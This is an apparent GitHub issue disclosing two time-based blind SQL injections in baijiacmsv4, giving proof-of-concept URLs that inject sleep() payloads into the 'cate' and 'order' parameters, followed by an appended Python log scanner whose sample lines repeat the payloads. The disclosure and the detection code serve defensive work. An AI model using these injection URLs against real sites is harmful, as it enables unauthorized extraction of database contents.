This repository has been archived by the owner on Jul 21, 2022. It is now read-only.

Two Vulnerabilities of Time-based SQL injection #2

Open
wxdigo8 opened this issue Jan 8, 2019 · 0 comments

wxdigo8 commented Jan 8, 2019

0x01: Description
Two time-based blind SQL injections to get data.

0x02: POC
First:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383

Second:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&page=1&_=1546926470383

0x03: Description
Request the URL:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
No time delay
Screenshot:
https://i.loli.net/2019/01/08/5c344a7845064.png

Request the URL:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(10)))v)/*'%2b(select(0)from(select(sleep(10)))v)%2b'%22%2b(select(0)from(select(sleep(10)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
Time delay
Screenshot:
https://i.loli.net/2019/01/08/5c344afbc5d7d.png

Test with sqlmap:
https://i.loli.net/2019/01/08/5c344b46484a1.png
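
A way to spot requests like the ones reported above in web-server access logs, added here as an example that is not part of the original issue or of the baijiacms code. It assumes that legitimate `cate` values are numeric ids and legitimate `order` values are bare identifiers; those expected formats, the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed shapes of legitimate values (not taken from the baijiacms source):
# cate is a numeric category id, order is a bare column-like identifier.
EXPECTED = {
    "cate": re.compile(r"\d{1,10}"),
    "order": re.compile(r"[A-Za-z_]{1,32}"),
}
# Tokens seen in the reported requests; used only to label a finding.
SQL_TOKENS = re.compile(r"\b(select|sleep|benchmark)\s*\(|/\*|\*/", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def check_request(target):
    """Return [(param, value, label)] for cate/order values that fail validation."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("op") != ["get_list"]:
        return []
    findings = []
    for name, pattern in EXPECTED.items():
        for value in query.get(name, []):
            if value == "" or pattern.fullmatch(value):
                continue
            label = "sql-syntax" if SQL_TOKENS.search(value) else "unexpected-format"
            findings.append((name, value, label))
    return findings


def scan_log(lines):
    """Yield (line_number, findings) for access-log lines with suspicious values."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        findings = check_request(match.group(1)) if match else []
        if findings:
            yield number, findings


# Constructed sample log lines (combined log format), not captured traffic.
SAMPLE_LOG = [
    '127.0.0.1 - - [08/Jan/2019:10:00:01 +0000] "GET /index.php?m=eshop&do=goods&op=get_list&cate=12&order=&page=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [08/Jan/2019:10:00:05 +0000] "GET /index.php?m=eshop&do=goods&op=get_list&cate=(select(0)from(select(sleep(10)))v)&order=&page=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [08/Jan/2019:10:00:20 +0000] "GET /index.php?m=eshop&do=goods&op=get_list&cate=&order=(select(0)from(select(sleep(10)))v)&page=1 HTTP/1.1" 200 512',
    '127.0.0.1 - - [08/Jan/2019:10:00:31 +0000] "GET /index.php?m=eshop&do=goods&op=get_list&cate=3&order=12%2bx&page=1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```

The same two format checks, applied server-side before the values reach the query, reject both reported requests.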
